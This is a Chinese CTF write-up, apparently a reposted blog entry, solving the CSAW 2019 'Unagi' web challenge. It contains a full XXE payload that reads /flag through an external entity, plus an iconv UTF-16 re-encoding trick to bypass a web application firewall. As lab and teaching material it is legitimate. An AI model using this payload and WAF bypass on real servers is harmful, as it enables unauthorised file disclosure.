当前位置: 首页 > news >正文

[CSAWQual 2019]Web_Unagi ---不会编程的崽

news 来源:原创 2024/4/29 17:50:59

不知道刷了多少天了,又是一题关于xxe漏洞的。

web的习惯性操作。

1.功能点&cms

2.源代码

3.敏感文件泄露

当然这是我个人的习惯。这里进入界面后又upload功能,不会是传马吧。但是旁边给了上传文件格式。仅仅只看界面似乎没什么区别,源代码,启动!!!

很明显,xml的格式。猜测这里需要上传xml文件,漏洞属于xxe。最右边给出了提示flag在根目录下边。

<users><user><username>111</username><password>111</password><name>111</name><email>111</email>  <group>1111</group></user>
</users>

 上传成功,有回显。

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<users><user><username>&xxe;</username><password>&xxe;</password><name>&xxe;</name><email>&xxe;</email>  <group>&xxe;</group><intro>&xxe;</intro></user>
</users>

 构造payload,又给提示,被防火墙拦截了。。。

怎么绕过呢?转换编码即可,utf16

cat 1.xml | iconv -f utf8 -t utf-16 1.xml>2.xml

 iconv是liunx转编码的命令

emmmm,怎么还有长度限制,不过看了一下user界面,还有个标签intro

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" >
]>
<users><user><username>&xxe;</username><password>&xxe;</password><name>&xxe;</name><email>&xxe;</email>  <group>&xxe;</group><intro>&xxe;</intro></user>
</users>

记得自己转码哦

 

 

相关文章:

  • 面试经典150题(101-104)
  • 电脑解锁后黑屏有鼠标--亲测!!不需要重装系统!!
  • gan, pixel2pixel, cyclegan, srgan图像超分辨率
  • git 如何将多个提交点合并为一个提交点 commit
  • chromedriverUnable to obtain driver for chrome using ,selenium找不到chromedriver
  • 【AI视野·今日NLP 自然语言处理论文速览 第八十二期】Tue, 5 Mar 2024
  • Java零基础 - try-catch-finally和throw语句
  • Mysql学习之MVCC解决读写问题
  • 新学习到的知识点【Python/C++】,持续更新中
  • Android 多桌面图标启动, 爬坑点击打开不同页面
  • C语言项目实战——贪吃蛇
  • Docker知识点总结二
  • Java agent技术的注入利用与避坑点
  • 主流开发语言和开发环境介绍
  • Docker Register 搭建私有镜像仓库
  • 【node学习】协程
  • Android 控件背景颜色处理
  • Cookie 在前端中的实践
  • laravel5.5 视图共享数据
  • webpack4 一点通
  • 计算机在识别图像时“看到”了什么?
  • 浏览器缓存机制分析
  • 前端路由实现-history
  • 前端学习笔记之原型——一张图说明`prototype`和`__proto__`的区别
  • 如何利用MongoDB打造TOP榜小程序
  • 如何学习JavaEE,项目又该如何做?
  • 使用docker-compose进行多节点部署
  • 事件委托的小应用
  • (ibm)Java 语言的 XPath API
  • (poj1.3.2)1791(构造法模拟)
  • (附源码)计算机毕业设计ssm电影分享网站
  • (每日持续更新)jdk api之FileFilter基础、应用、实战
  • (三十五)大数据实战——Superset可视化平台搭建
  • (转)linux下的时间函数使用
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案
  • .net framework4与其client profile版本的区别
  • .NET 读取 JSON格式的数据
  • .net2005怎么读string形的xml,不是xml文件。
  • .netcore如何运行环境安装到Linux服务器
  • .net中调用windows performance记录性能信息
  • .pyc文件是什么?
  • [ Linux 长征路第五篇 ] make/Makefile Linux项目自动化创建工具
  • [3D基础]理解计算机3D图形学中的坐标系变换
  • [AIGC] Spring Interceptor 拦截器详解
  • [C# 开发技巧]如何使不符合要求的元素等于离它最近的一个元素
  • [C#]winform部署PaddleOCRV3推理模型
  • [CISCN2019 华北赛区 Day1 Web5]CyberPunk --不会编程的崽
  • [CSDN首发]鱿鱼游戏的具体玩法详细介绍
  • [C语言]——内存函数
  • [gdc19]《战神4》中的全局光照技术
  • [HTML]Web前端开发技术18(HTML5、CSS3、JavaScript )HTML5 基础与CSS3 应用——喵喵画网页
  • [HXPCTF 2021]includer‘s revenge
  • [java] 23种设计模式之责任链模式
  • [LeetCode刷题笔记]1 - 两数之和(哈希表)
  • [Linux] 进程间通信基础